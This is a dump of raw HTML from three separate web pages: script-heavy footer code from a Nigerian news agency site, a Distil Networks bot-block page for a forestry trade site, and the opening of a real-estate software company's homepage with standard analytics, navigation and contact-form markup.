src='https://s18694.pcdn.co/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"nanng"}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.17' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var embedVars = {"disqusConfig":{"integration":"wordpress 3.0.17"},"disqusIdentifier":"372 http:\/\/goodnews.xplodedthemes.com\/?page_id=372","disqusShortname":"nanng","disqusTitle":"News Agency of Nigeria (NAN)","disqusUrl":"https:\/\/www.nan.ng\/","postId":"372"}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/plugins/disqus-comment-system/public/js/comment_embed.js?ver=3.0.17' defer></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920' defer></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/comment-reply.min.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/modernizr/modernizr.min.js' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/plugins/js_composer/assets/lib/waypoints/waypoints.min.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/sticky-sidebar/js/theia-sticky-sidebar.min.js' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/jquery-autotype/jquery.autotype.min.js' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/jquery-visible/jquery.visible.min.js' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/retina/retina.min.js' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var xt_vars = {"ajaxurl":"https:\/\/www.nan.ng\/wp-admin\/admin-ajax.php?lang=","lang":"","theme_url":"https:\/\/www.nan.ng\/wp-content\/themes\/nantheme","assets_url":"https:\/\/www.nan.ng\/wp-content\/themes\/nantheme\/assets","enable_nice_scroll":"","enable_smooth_scroll":"","enable_sticky_sidebars":"1","enable_thumbnail_fadein_onscroll":"","megamenu_animation":"slide-up","megamenu_delay":"50","megamenu_speed":"400","megamenu_push_down":"","hide_admin_bar":"1","spinner":"<div class=\"xt-spinner-wrap \">\n\t\t\t\t<div class=\"xt-spinner sk-circle\">\n\t\t\t <div class=\"sk-circle1 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle2 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle3 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle4 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle5 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle6 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle7 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle8 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle9 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle10 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle11 sk-child\"><\/div>\n\t\t\t <div class=\"sk-circle12 sk-child\"><\/div>\n\t\t\t <\/div><\/div>","custom_js":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/js/all.min.js?ver=1.0' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/wp-embed.min.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.1.1' defer></script> <!-- AdRotate JS --> <script type="text/javascript"> jQuery(document).ready(function(){ if(jQuery.fn.gslider) { jQuery('.g-1').gslider({ groupid: 1, speed: 25000 }); jQuery('.g-2').gslider({ groupid: 2, speed: 35000 }); } }); </script> <!-- /AdRotate JS --> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.2.1',blog:'115095161',post:'372',tz:'1',srv:'www.nan.ng'} ]); _stq.push([ 'clickTrackerInit', '115095161', '372' ]); </script> <!-- Go to www.addthis.com/dashboard to customize your tools --> <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-57b6e1b2ada6c1e8"></script> <script type="text/javascript"> var infolinks_pid = 3162279; var infolinks_wsid = 0; </script> <script type="text/javascript" src="//resources.infolinks.com/js/infolinks_main.js"></script> </body> </html>
0
<!DOCTYPE html> <html> <head> <title>Pardon Our Interruption</title> <link rel="stylesheet" type="text/css" href="//cdn.distilnetworks.com/css/distil.css" media="all"> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=1000" /> <META NAME="robots" CONTENT="noindex, nofollow"> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> </head> <body class='block-page'> <div class='container'> <div class='row'> <div class='sidebar col-lg-4 col-sm-5'> <img src="//cdn.distilnetworks.com/images/anomaly-detected.png" alt="0"> </div> <div class='content col-lg-8 col-sm-7'> <h1>Pardon Our Interruption...</h1> <p> As you were browsing <strong>www.forestrytrader.com</strong> something about your browser made us think you were a bot. There are a few reasons this might happen: </p> <ul> <li>You're a power user moving through this website with super-human speed.</li> <li>You've disabled JavaScript in your web browser.</li> <li>A third-party browser plugin, such as Ghostery or NoScript, is preventing JavaScript from running. Additional information is available in this <a title='Third party browser plugins that block javascript' href='http://ds.tl/help-third-party-plugins' target='_blank'>support article</a>.</li> </ul> <p> To request an unblock, please fill out the form below and we will review it as soon as possible. </p> <form id="atvfsewbvxfdrxfcyv" method="POST" action="wfsvtbvcbw.html" style="display:none"><label>Ignore: <input type="text" name="first_name" /></label><label>Ignore: <input type="text" name="last_name" /></label><label>Ignore: <input type="text" name="email" /></label><label>Ignore: <input type="submit" value="Submit" /></label></form><form id="distilUnblockForm" method="post" action="https://unblock.distilnetworks.com/"> <div id="dUF_first_name"> <label for="dUF_input_first_name">First Name:</label> <input type="text" id="dUF_input_first_name" name="first_name" value="" /> </div> <div id="dUF_last_name"> <label for="dUF_input_last_name">Last Name:</label> <input type="text" id="dUF_input_last_name" name="last_name" value="" /> </div> <div id="dUF_email"> <label for="dUF_input_email">E-mail:</label> <input type="text" id="dUF_input_email" name="email" value="" /> </div> <div id="dUF_city" style="display: none"> <label for="dUF_input_city">City (Leave Blank):</label> <input type="text" id="dUF_input_city" name="city" value="" /> </div> <div id="dUF_unblock"> <input id="dUF_input_unblock" name="unblock" type="submit" value="Request Unblock" /> </div> <div id="dUF_unblock_text"> You reached this page when attempting to access https://www.forestrytrader.com/Error/Soft404?404;http://forestrytrader.com:80/dxvnoarragrclggb653202.js from 76.119.231.70 on 2019-05-16 15:41:45 UTC.<br /> Trace: 0de121a3-2e9a-4ec0-91ce-f5b8f6bbe40f via 449bb29d-9aa5-44ea-a964-418570a62186 </div> <div id="dUF_form_fields" style="display: none"> <input type="hidden" name="Q" value="0de121a3-2e9a-4ec0-91ce-f5b8f6bbe40f" /> <input type="hidden" name="P" value="6D4E4D1D-7094-375D-A439-0568A6A70836" /> <input type="hidden" name="I" value="" /> <input type="hidden" name="U" value="" /> <input type="hidden" name="SF" value="" /> <input type="hidden" name="F" value="" /> <input type="hidden" name="V" value="13" /> <input type="hidden" name="D" value="12824" /> <input type="hidden" name="A" value="2792" /> <input type="hidden" name="LOADED" value="2019-05-16 15:41:45" /> <input type="hidden" name="H" value='www.forestrytrader.com' /> </div> </form> </div> </div> </div> </body> </html>
0
<!doctype html> <html> <head> <meta charset="UTF-8"><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <title>End-to-End Real Estate Software Solutions | Bridge Interactive</title> <!-- This site is optimized with the Yoast SEO plugin v10.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Bridge Interactive helps real estate pros focus on clients, not data. Our end-to-end real estate software solutions make managing your data easy."/> <link rel="canonical" href="https://www.bridgeinteractive.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="End-to-End Real Estate Software Solutions | Bridge Interactive" /> <meta property="og:description" content="Bridge Interactive helps real estate pros focus on clients, not data. Our end-to-end real estate software solutions make managing your data easy." /> <meta property="og:url" content="https://www.bridgeinteractive.com/" /> <meta property="og:site_name" content="Bridge Interactive" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Bridge Interactive helps real estate pros focus on clients, not data. Our end-to-end real estate software solutions make managing your data easy." /> <meta name="twitter:title" content="End-to-End Real Estate Software Solutions | Bridge Interactive" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.bridgeinteractive.com/#website","url":"https://www.bridgeinteractive.com/","name":"Bridge Interactive","potentialAction":{"@type":"SearchAction","target":"https://www.bridgeinteractive.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//app-sj01.marketo.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Bridge Interactive &raquo; Feed" href="https://www.bridgeinteractive.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Bridge Interactive &raquo; Comments Feed" href="https://www.bridgeinteractive.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.bridgeinteractive.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.bridgeinteractive.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.bridgeinteractive.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='bridgeinteractive-style-css' href='https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/style.css?ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.bridgeinteractive.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.bridgeinteractive.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://www.bridgeinteractive.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.bridgeinteractive.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.bridgeinteractive.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://www.bridgeinteractive.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.bridgeinteractive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.bridgeinteractive.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.bridgeinteractive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.bridgeinteractive.com%2F&#038;format=xml" /> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <link rel="icon" href="https://wp.zillowstatic.com/bridge-interactive/wp-content/uploads/2018/03/cropped-RGB_BLUE_BRIDGE_arch-burst-ffa993-a04fc0-32x32.png" sizes="32x32" /> <link rel="icon" href="https://wp.zillowstatic.com/bridge-interactive/wp-content/uploads/2018/03/cropped-RGB_BLUE_BRIDGE_arch-burst-ffa993-a04fc0-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://wp.zillowstatic.com/bridge-interactive/wp-content/uploads/2018/03/cropped-RGB_BLUE_BRIDGE_arch-burst-ffa993-a04fc0-180x180.png" /> <meta name="msapplication-TileImage" content="https://wp.zillowstatic.com/bridge-interactive/wp-content/uploads/2018/03/cropped-RGB_BLUE_BRIDGE_arch-burst-ffa993-a04fc0-270x270.png" /> <!-- styles--> <link href="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/css/bootstrap.css" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/css/min/style.css"> <!-- GA script --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-96988593-1', 'auto'); ga('send', 'pageview'); </script> </head> <body class="home page-template page-template-front-page page-template-front-page-php page page-id-214"> <div id="gray-overlay"></div> <!-- Nav --> <nav class="navbar"> <div class="container"> <div class="logo-container"> <button type="button" class="nav-toggle"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a href="/"> <img src="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/img/[email protected]" class="logo"/> </a> </div> <ul class="nav"> <li class="drop"> <span href="#" class="drop-toggle" data-toggle="drop">MLS </span> <span class="menu-arrow"></span> <div class="drop-menu"><ul id="menu-mls" class="drop-menu"><li id="menu-item-140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-140"><a href="https://www.bridgeinteractive.com/mls/">Overview</a></li> <li id="menu-item-126" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-126"><a href="https://www.bridgeinteractive.com/mls/listing-input/">Listing Input</a></li> <li id="menu-item-127" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-127"><a href="https://www.bridgeinteractive.com/mls/data-management/">Data Management</a></li> <li id="menu-item-125" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-125"><a href="https://www.bridgeinteractive.com/mls/bridge-api/">BridgeAPI</a></li> <li id="menu-item-128" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-128"><a href="https://www.bridgeinteractive.com/mls/agreement-management/">Agreement Management</a></li> </ul></div> </li> <li class="drop"> <span href="#" class="drop-toggle" data-toggle="drop">Brokers </span> <span class="menu-arrow"></span> <div class="drop-menu"><ul id="menu-brokers" class="drop-menu"><li id="menu-item-135" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-135"><a href="https://www.bridgeinteractive.com/brokers/">Overview</a></li> <li id="menu-item-137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-137"><a href="https://www.bridgeinteractive.com/brokers/listing-input/">Listing Input</a></li> <li id="menu-item-138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138"><a href="https://www.bridgeinteractive.com/brokers/bridge-api/">BridgeAPI</a></li> </ul></div> </li> <li class="drop"> <span href="#" class="drop-toggle" data-toggle="drop">Developers </span> <span class="menu-arrow"></span> <div class="drop-menu"><ul id="menu-developers" class="drop-menu"><li id="menu-item-133" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-133"><a href="https://www.bridgeinteractive.com/developers/">Overview</a></li> <li id="menu-item-134" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-134"><a href="https://www.bridgeinteractive.com/developers/data-access/">Data Access</a></li> <li id="menu-item-132" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-132"><a href="https://www.bridgeinteractive.com/developers/bridge-api/">BridgeAPI</a></li> </ul></div> </li> <li class="drop"> <span href="#" class="drop-toggle" data-toggle="drop">Resources </span> <span class="menu-arrow"></span> <div class="drop-menu"><ul id="menu-resources" class="drop-menu"><li id="menu-item-131" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-131"><a href="https://www.bridgeinteractive.com/resources/">Overview</a></li> <li id="menu-item-130" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-130"><a href="https://www.bridgeinteractive.com/resources/rets-sdk/">RETS SDK</a></li> <li id="menu-item-129" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-129"><a href="https://www.bridgeinteractive.com/resources/api-documentation/">BridgeAPI Documentation</a></li> </ul></div> </li> <li class="drop"> <span href="#" class="drop-toggle" data-toggle="drop">About</span> <span class="menu-arrow"></span> <div class="drop-menu"><ul id="menu-privacy" class="drop-menu"><li id="menu-item-124" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-124"><a href="https://www.bridgeinteractive.com/about/">About Us</a></li> <li id="menu-item-123" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-123"><a href="https://www.bridgeinteractive.com/privacy-policy/">Privacy Policy</a></li> </ul></div> </li> <li class="last-item"> <a href="https://www.bridgeinteractive.com/blog/" class="nav-blog-link" data-toggle="drop">Blog</a> </li> <li class="btn-item"> <div class="btn btn-blue schedule"> <p class="small"><a href="">Get in touch</a></p> </div> </li> </ul> </div> </nav><!-- //nav --> <!-- form pop up --> <div id="form-popup" class="popup"> <div class="popup-wrap"> <span class="close-btn"> <img src="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/img/[email protected]" /> </span> <h3>What’s your biggest tech headache?</h3> <p>Chances are we can help.</p> <div role="form" class="wpcf7" id="wpcf7-f165-o1" lang="en-US" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f165-o1" method="post" class="wpcf7-form" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="165" /> <input type="hidden" name="_wpcf7_version" value="5.1.1" /> <input type="hidden" name="_wpcf7_locale" value="en_US" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f165-o1" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="g-recaptcha-response" value="" /> </div> <p><label> First name<br /> <span class="wpcf7-form-control-wrap your-first-name"><input type="text" name="your-first-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </label></p> <p><label> Last name<br /> <span class="wpcf7-form-control-wrap your-last-name"><input type="text" name="your-last-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </label></p> <p><label> Company name<br /> <span class="wpcf7-form-control-wrap your-company"><input type="text" name="your-company" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </label></p> <p><label> Email<br /> <span class="wpcf7-form-control-wrap your-email"><input type="email" name="your-email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email" aria-required="true" aria-invalid="false" /></span> </label></p> <p><label> Phone<br /> <span class="wpcf7-form-control-wrap your-phone"><input type="tel" name="your-phone" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-tel wpcf7-validates-as-tel" aria-invalid="false" /></span> </label></p> <p><label> Select role in real estate<br /> <span class="wpcf7-form-control-wrap your-role"><select name="your-role" class="wpcf7-form-control wpcf7-select" aria-invalid="false"><option value="">---</option><option value="MLS">MLS</option><option value="Broker">Broker</option><option value="Developer">Developer</option></select></span> </label><br /> <span id="wpcf7-5cdd713875a5e" class="wpcf7-form-control-wrap honeypot-392-wrap" style="display:none !important; visibility:hidden !important;"><label class="hp-message">Please leave this field empty.</label><input class="wpcf7-form-control wpcf7-text" type="text" name="honeypot-392" value="" size="40" tabindex="-1" autocomplete="nope" /></span><br /> <input type="submit" value="We’d love to hear from you!" class="wpcf7-form-control wpcf7-submit" /></p> <div class="wpcf7-response-output wpcf7-display-none"></div></form></div> </div> </div> <!-- video popup --> <div id="video-popup" class="popup"> <div class="popup-wrap"> <span class="close-btn"> <img src="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/img/btn-close.png" /> </span> <video id="videoPlayer" class="responsive-video" controls> <source id="videoBridge" src="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/bridge_zillowgroup_sponsorvideo_082718.mp4" type="video/mp4"> </video> </div> </div> <!-- content --> <div class="hero"> <div class="container"> <div class="col-lg-1"></div> <div class="col-lg-10"> <div class="row light-blue-bg"> <div class="col-lg-12"> <h1>Never wait to innovate.</h1> </div> <div class="col-lg-12"> <h4>Bridge makes it easier to create better listings, send them places and use them to develop better marketing and more powerful software.</h4> <h6 class="medium-show"><a class="video-link" href="" target="_blank">See how we do it.</a></h6> <div class="btn btn-white"> <a class="video-link" href="" target="_blank">Watch Now</a> </div> </div> </div> </div> <div class="col-lg-1"></div> <!-- blue overlay --> </div> </div><!-- //hero --> <div class="solutions-container container"> <div class="column-3"> <div class="semi-img mls"> <h2 class="semi-heading">MLS</h2> </div> <div class="semi-text mls"> <p class="color-white">We provide modern solutions that help answer member demand, give you the control you need, and open paths to faster innovation for everyone. </p> <div class="btn btn-clear"> <a href="/mls/">MLS solutions</a> </div> </div> </div> <div class="column-3 middle"> <div class="semi-img broker"> <h2 class="semi-heading">Brokers</h2> </div> <div class="semi-text broker"> <p class="color-white">Our products remove barriers that stand between you, your data and a more innovative future.</p> <div class="btn btn-clear"> <a href="/brokers/">Broker solutions</a> </div> </div> </div> <div class="column-3"> <div class="semi-img developer"> <h2 class="semi-heading">Developers</h2> </div> <div class="semi-text developer"> <p class="color-white">BridgeAPI removes the distractions of managing listing data that keep you from building the best products.</p> <div class="btn btn-clear"> <a href="/developers/">Developer solutions</a> </div> </div> </div> </div><!-- solutions container --> <div class="task-icons container center-text"> <div class="col-lg-12"> 